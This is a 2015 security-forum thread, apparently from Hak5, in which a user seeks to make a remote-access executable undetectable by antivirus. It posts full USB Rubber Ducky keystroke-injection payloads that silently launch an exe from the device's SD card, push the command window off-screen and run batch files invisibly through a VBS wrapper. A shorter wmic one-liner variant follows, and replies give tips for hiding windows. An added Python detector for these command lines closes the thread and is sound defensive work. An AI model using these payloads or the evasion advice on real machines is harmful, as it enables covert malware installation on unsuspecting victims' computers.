Net_Spy Posted May 23, 2015

Greetings,

I would like to set up a Rubber Ducky USB. I would appreciate your assistance. I would also like to FUD my remote assistant tool exe; any idea how to do this using Veil or any other good method to FUD it with 0 detection?

Thanks,
Regards

Rkiver Posted May 23, 2015

In fairness you'd be more likely to find an answer at https://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/

Net_Spy Posted May 25, 2015

Well, I've generated the following payload with the help of the GUI encoder.

    REM Author: overwraith
    REM Name: RunEXE_V3.txt
    REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
    REM Encoder V2.4+
    REM Using the run command for a broader OS base.
    DEFAULT_DELAY 75
    DELAY 3000
    GUI R
    DELAY 1000
    STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    REM Change directories because System32 appears to be protected.
    STRING CD %TEMP%
    ENTER
    REM Make batch file that waits for SD card to mount.
    REM Delete batch file if already exists
    STRING erase /Q DuckyWait.bat
    ENTER
    STRING copy con DuckyWait.bat
    ENTER
    REM DuckyWait.bat
    STRING :while1
    ENTER
    STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
    ENTER
    STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
    ENTER
    STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
    ENTER
    STRING )
    ENTER
    STRING )
    ENTER
    STRING if Exist %DuckyDrive% (
    ENTER
    STRING goto :break
    ENTER
    STRING )
    ENTER
    STRING timeout /t 30
    ENTER
    STRING goto :while1
    ENTER
    STRING :break
    ENTER
    REM Continue script.
    STRING START %DuckyDrive%\form1.exe
    ENTER
    CONTROL z
    ENTER
    REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
    REM Delete vbs file if already exists
    STRING erase /Q invis.vbs
    ENTER
    REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
    STRING copy con invis.vbs
    ENTER
    STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
    ENTER
    CONTROL Z
    ENTER
    REM RUN THE BATCH FILE
    STRING wscript.exe invis.vbs DuckyWait.bat
    ENTER
    STRING EXIT
    ENTER

I copied the exe into the SD card root path, and inject.bin as well, then plugged it into Windows XP. It shows all the commands on the cmd screen, but the exe does not execute.

Regards
Net_Spy

Net_Spy Posted May 25, 2015

Furthermore, I did a little firmware update before the above: firmware duck_v2.1.hex.

Steps followed from here using Ubuntu: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky#Flashing_the_Firmware

Number written on chip: 32uc3b1256

Regards
Net_Spy

Net_Spy Posted May 27, 2015

It does not work. I've installed the twin composite firmware and it worked. One more thing I would like to know: is there any way that the payload runs without any popup windows? Looking forward to your kind response.

Regards
Net_Spy

Sildaekar Posted May 28, 2015

> It does not work. I've installed the twin composite firmware and it worked. One more thing I would like to know: is there any way that the payload runs without any popup windows? Looking forward to your kind response.
>
> Regards
> Net_Spy

Sadly there isn't. The ducky is just a USB HID, so it is limited to only what a USB keyboard can do.

Net_Spy Posted June 2, 2015

Thanks, but I just wanted to hide those windows which are opened via the above-mentioned script, like opening the run prompt and typing the command, then opening cmd, minimizing it, etc. I only want to know: is there a way to do all of this silently?

Regards
Net_Spy

Sildaekar Posted June 2, 2015

You could just move the window out of view by doing the following:

    ALT+SPACE M DOWN DOWN DOWN ENTER

Just keep in mind the above is more or less pseudocode... all this is doing is bringing up a menu, choosing "Move" and then hitting the down key until it's off the screen, then hitting "Enter" to bring it back into focus. This way it's off the screen so no one can see it, but you can still keep typing and running commands.

Net_Spy Posted June 4, 2015

Thanks @Sildaekar.

sn0wfa11 Posted June 6, 2015

See my recent post: https://forums.hak5.org/index.php?/topic/35992-meterpreter-reverse-tcp-ducky-injection-using-powershell-and-veil/

Net_Spy Posted November 20, 2015

Greetings,

I've come across a script that claims to be faster than the script written by overwraith:

    REM Author: overwraith
    REM Name: RunEXE_V3.txt
    REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
    REM Encoder V2.4+
    REM Using the run command for a broader OS base.
    DEFAULT_DELAY 75
    DELAY 3000
    GUI R
    DELAY 1000
    STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    REM Change directories because System32 appears to be protected.
    STRING CD %TEMP%
    ENTER
    REM Make batch file that waits for SD card to mount.
    REM Delete batch file if already exists
    STRING erase /Q DuckyWait.bat
    ENTER
    STRING copy con DuckyWait.bat
    ENTER
    REM DuckyWait.bat
    STRING :while1
    ENTER
    STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
    ENTER
    STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
    ENTER
    STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
    ENTER
    STRING )
    ENTER
    STRING )
    ENTER
    STRING if Exist %DuckyDrive% (
    ENTER
    STRING goto :break
    ENTER
    STRING )
    ENTER
    STRING timeout /t 30
    ENTER
    STRING goto :while1
    ENTER
    STRING :break
    ENTER
    REM Continue script.
    STRING START %DuckyDrive%\HelloWorld.exe
    ENTER
    CONTROL z
    ENTER
    REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
    REM Delete vbs file if already exists
    STRING erase /Q invis.vbs
    ENTER
    REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
    STRING copy con invis.vbs
    ENTER
    STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
    ENTER
    CONTROL Z
    ENTER
    REM RUN THE BATCH FILE
    STRING wscript.exe invis.vbs DuckyWait.bat
    ENTER
    STRING EXIT
    ENTER

overwraith's script is working great, only taking a few seconds and lots of commands. Following is the shortened script:

    DELAY 3000
    GUI r
    DELAY 100
    cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe
    DELAY 10
    ENTER

I've tried it but failed to execute it. It gives the error: Windows cannot find 'c'. Make sure you typed the name correctly, and then try again. Is there any way to make the above short script run an exe from the SD card?

Regards
Net_Spy

this-is-me Posted November 20, 2015

Are you sure you have the ducky's drive label called DY, and a file named t.exe on the root of the SD card? The last code works fine for me.

Net_Spy Posted November 21, 2015

I've renamed my drive to the same and the file to t.exe. I'm trying it on Windows 7.

Regards
Net_Spy

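For defenders, an added example (not code from any poster in this thread): a small detector that flags the process command lines these payloads type, and raises severity when two different ones appear on the same host within a short window. The event fields (`host`, `ts`, `parent`, `cmdline`), host names and sample events are assumptions constructed for illustration; real input would come from process command-line logging.

```python
import re
from collections import defaultdict

# Command-line patterns taken from the payloads quoted in this thread.
SIGNATURES = {
    # cmd started with the /Q /D /T:xx /K switch cluster
    "cmd_quiet_switches": re.compile(
        r"\bcmd(\.exe)?\b(?=.*\s/Q\b)(?=.*\s/D\b)(?=.*\s/T:[0-9A-F]{2}\b)(?=.*\s/K\b)", re.I),
    # wscript running a .vbs that is handed a .bat (hidden-window wrapper)
    "vbs_hides_batch": re.compile(r"\bwscript(\.exe)?\b.*\.vbs\b.*\.bat\b", re.I),
    # volume-label lookup whose result is passed straight to "start"
    "label_lookup_then_start": re.compile(
        r"\bwmic\s+volume\s+get\b.*\blabel\b.*\bdo\s+start\s+%", re.I),
}

def scan(events, window=120):
    """Return {host: {"hits": [(ts, signature), ...], "severity": str}}."""
    hits = defaultdict(list)
    for ev in events:
        # Run-dialog launches are children of explorer.exe; commands typed
        # into that cmd session are children of cmd.exe.
        if ev["parent"].lower() not in ("explorer.exe", "cmd.exe"):
            continue
        for name, rx in SIGNATURES.items():
            if rx.search(ev["cmdline"]):
                hits[ev["host"]].append((ev["ts"], name))
    report = {}
    for host, found in hits.items():
        found.sort()
        # Two different signatures close together on one host: likely one script.
        chained = any(b[0] - a[0] <= window and a[1] != b[1]
                      for a, b in zip(found, found[1:]))
        report[host] = {"hits": found, "severity": "high" if chained else "medium"}
    return report

# Constructed sample events (hypothetical hosts, timestamps in seconds).
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": 100, "parent": "explorer.exe",
     "cmdline": "cmd /Q /D /T:7F /F:OFF /V:ON /K"},
    {"host": "WS01", "ts": 130, "parent": "cmd.exe",
     "cmdline": "wscript.exe invis.vbs DuckyWait.bat"},
    {"host": "WS02", "ts": 500, "parent": "explorer.exe",
     "cmdline": r"""cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe"""},
    {"host": "WS03", "ts": 700, "parent": "explorer.exe", "cmdline": r"cmd.exe /c dir C:\Users"},
    {"host": "WS03", "ts": 710, "parent": "svchost.exe",
     "cmdline": r"wscript.exe C:\scripts\logon.vbs"},
]

if __name__ == "__main__":
    for host, result in scan(SAMPLE_EVENTS).items():
        print(host, result["severity"], [n for _, n in result["hits"]])
```

The patterns match only what is visible in the thread, so they are a starting point for tuning against a site's own baseline rather than a complete rule set.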